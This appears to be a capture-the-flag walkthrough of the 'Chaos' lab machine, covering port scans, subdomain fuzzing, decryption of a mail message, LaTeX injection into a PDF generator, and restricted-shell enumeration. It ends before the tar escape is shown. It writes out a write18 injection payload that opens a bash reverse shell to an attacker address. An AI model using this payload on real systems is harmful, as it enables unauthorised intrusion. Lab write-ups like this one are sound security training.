$ nmap -p- --min-rate 5000 10.129.253.192
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-05 13:03 +08
Nmap scan report for 10.129.253.192
Host is up (0.0076s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
110/tcp open pop3
143/tcp open imap
993/tcp open imaps
995/tcp open pop3s
10000/tcp open snet-sensor-mgmt
Mail ports and Webmin on port 10000 is open. Might need to read messages for credentials later. Did a detailed scan too:
$ nmap -p 80,110,143,993,995,10000 -sC -sV --min-rate 5000 chaos.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-05 13:06 +08
Nmap scan report for chaos.htb (10.129.253.192)
Host is up (0.0061s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Chaos
|_http-server-header: Apache/2.4.34 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: PIPELINING TOP UIDL SASL AUTH-RESP-CODE STLS RESP-CODES CAPA
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
143/tcp open imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_imap-capabilities: have LOGINDISABLEDA0001 IDLE Pre-login more LITERAL+ post-login ENABLE capabilities listed ID LOGIN-REFERRALS IMAP4rev1 STARTTLS OK SASL-IR
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: have IDLE AUTH=PLAINA0001 more LITERAL+ post-login ENABLE capabilities listed ID LOGIN-REFERRALS IMAP4rev1 Pre-login OK SASL-IR
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) AUTH-RESP-CODE USER RESP-CODES CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.890
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I added chaos.htb to my /etc/hosts file since there's a DNS name returned from the above scan.
Web Enum -> Mail Creds
Visiting the IP address alone blocks us:
Visiting chaos.htb shows us a typical security company page:
The website looked rather static, so I did a gobuster directory and wfuzz subdomain scan. The gobuster scan returned nothing of interest, while the wfuzz scan did return a webmail subdomain.
$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh=73 -H 'Host:FUZZ.chaos.htb' http://chaos.htb
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://chaos.htb/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000005: 200 120 L 386 W 5607 Ch "webmail"
I also did a gobuster scan with the IP address of the machine as the URL, and found a Wordpress site:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.253.192 -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.253.192
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/08/05 13:12:44 Starting gobuster in directory enumeration mode
===============================================================
/wp (Status: 301) [Size: 313] [-> http://10.129.253.192/wp/]
The Wordpress site was rather simple as well, and just contained one locked article:
I didn't have a password yet, so I ran a wpscan on the URL and found one user named human:
The message says that You are the password XD, meaning that sahay is the AES key used. The encryption sc ript writes the file size as the first 16 bytes, and then the next 16 bytes is the IV used. The key used is the SHA256 hash of sahay.
This would output a base64 encoded string, and when decoded it reveals a hidden URL:
$ python3 dec.py | base64 -d
Hii Sahay
Please check our new service which create pdf
p.s - As you told me to encrypt important msg, i did :)
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Thanks,
Ayush
PDF -> RCE
The URL shows a PDF maker thing:
Sending requests doesn't seem to do anything, so I took a look at it within Burpsuite:
The above reveals that it is running an outdated version of pdfTeX. There are multiple methods of which we can use LaTeX injection to get RCE:
I used \immediate\write18\{id} to test, and it worked:
Using \immediate\write18{bash -c 'bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'} will get us a reverse shell:
ayush@chaos:/home$ echo $PATH
/home/ayush/.app
ayush@chaos:/home$ ls -la
rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
Using the TAB button, we can find the commands we can run:
! echo printf
./ elif pushd
: else pwd
[ enable read
[[ esac readarray
]] eval readonly
{ exec return
} exit select
alias export set
bg false shift
bind fc shopt
break fg source
builtin fi suspend
caller for tar
case function test
cd getopts then
command hash time
command_not_found_handle help times
compgen history trap
complete if true
compopt in type
continue jobs typeset
coproc kill ulimit
declare let umask
dir local unalias
dirs logout unset
disown mapfile until
do ping wait
done popd while
I noticed that ayush can run tar, which allows us to escape the shell using: